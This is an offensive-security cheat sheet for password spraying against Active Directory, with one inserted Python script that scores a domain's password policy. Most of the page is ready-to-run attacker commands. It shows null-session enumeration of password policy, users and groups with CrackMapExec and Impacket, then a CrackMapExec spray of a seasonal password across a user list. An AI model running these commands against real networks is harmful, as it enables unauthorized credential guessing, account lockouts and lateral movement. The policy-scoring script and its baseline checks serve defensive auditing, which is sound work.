Secondary Categories: 02-Credential Access, 02-Lateral Movement, 02-Privilege Escalation

When conducting internal password spraying, keep in mind that this action is very loud. I also highly recommend enumerating the domain's password policy (especially the lockout threshold and observation window) before beginning.

Password Policy

Enumerate Password Policy

# Get Password Policy with CrackMapExec (Unauthenticated null session)
cme smb $dc -u '' -p '' --pass-pol
 
# Get Password Policy with CrackMapExec
crackmapexec smb $dc -u $username -p $password --pass-pol
 
# Get Password Policy with Net Accounts
net accounts /domain
 
# Enumerate the default password policy settings from the Default Domain Policy GPO
Get-ADDefaultDomainPasswordPolicy

Fine-Grained Password Policy

# Enumerate all FGPPs configured
Get-ADFineGrainedPasswordPolicy -Filter *
 
# Obtain the FGPP assigned to a specific user
Get-ADUserResultantPasswordPolicy -Identity JSmith
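Once the policy has been pulled with net accounts /domain or --pass-pol, it is worth scoring it rather than eyeballing it. The Python below is an added example (not from the page, CrackMapExec or Microsoft): it parses the net accounts output format into numbers and flags the settings that make spraying cheap or passwords weak. The two sample outputs and the baseline thresholds (minimum length 14, lockout threshold at most 10) are this example's own assumptions.

```python
# Constructed sample of `net accounts /domain` output from a weak domain (not a real capture).
SAMPLE_WEAK = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Constructed sample in the same format with settings that make spraying expensive.
SAMPLE_HARDENED = """\
Minimum password length:                              14
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
The command completed successfully.
"""

# Labels as net accounts prints them, mapped to short keys used below.
FIELDS = {
    "Minimum password length": "min_length",
    "Length of password history maintained": "history",
    "Maximum password age (days)": "max_age",
    "Lockout threshold": "lockout_threshold",
    "Lockout duration (minutes)": "lockout_duration",
    "Lockout observation window (minutes)": "lockout_window",
}

# Baseline used by this example (an assumption, not a value from the page).
MIN_LENGTH = 14
MAX_LOCKOUT_THRESHOLD = 10


def parse_net_accounts(text):
    """Parse net accounts output into a dict of integers.

    net accounts prints "Never" / "Unlimited" where the DC stores 0, so any
    non-numeric value is normalised to 0. Lines without a known label are skipped.
    """
    policy = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        key = FIELDS.get(label.strip())
        if not sep or key is None:
            continue
        value = value.strip()
        policy[key] = int(value) if value.isdigit() else 0
    return policy


def assess_policy(policy):
    """Return a list of (severity, finding) strings for spray-friendly settings."""
    findings = []
    threshold = policy.get("lockout_threshold", 0)
    if threshold == 0:
        findings.append(("high", "lockout threshold is 0: unlimited guesses per account"))
    elif threshold > MAX_LOCKOUT_THRESHOLD:
        findings.append(("medium", f"lockout threshold {threshold} allows many guesses "
                                   f"per {policy.get('lockout_window', 0)}-minute window"))
    min_length = policy.get("min_length", 0)
    if min_length < MIN_LENGTH:
        findings.append(("medium", f"minimum password length {min_length} is below {MIN_LENGTH}"))
    max_age = policy.get("max_age", 0)
    if 0 < max_age <= 90:
        # Frequent forced rotation is what produces guessable season+year passwords.
        findings.append(("low", f"forced rotation every {max_age} days encourages "
                                "predictable season/year passwords"))
    return findings


if __name__ == "__main__":
    for name, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"[{name}]")
        for severity, finding in assess_policy(parse_net_accounts(sample)) or [("info", "no findings")]:
            print(f"  {severity}: {finding}")
```

Feed it the saved output of net accounts /domain and the findings map directly onto the GPO settings to change; a lockout threshold of 0 is the one that turns a spray from a timed exercise into an unbounded one.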

Gathering Domain Users

Once you have enumerated the password policy, if you don't already have a list of all domain users, I recommend gathering that next.

# Get List of Users and Groups with CrackMapExec (Unauthenticated null session)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
 
# Get List of Users with CrackMapExec (Authenticated)
crackmapexec smb $dc -u $username -p $password --users
 
# Get List of Users with Impacket
impacket-GetADUsers $domain/$username:$password -all -dc-ip $dc

Spraying

# Spray with CrackMapExec (quote the password so the shell does not history-expand the '!')
crackmapexec smb $ip -u $username_list -p 'Winter2022!' --continue-on-success
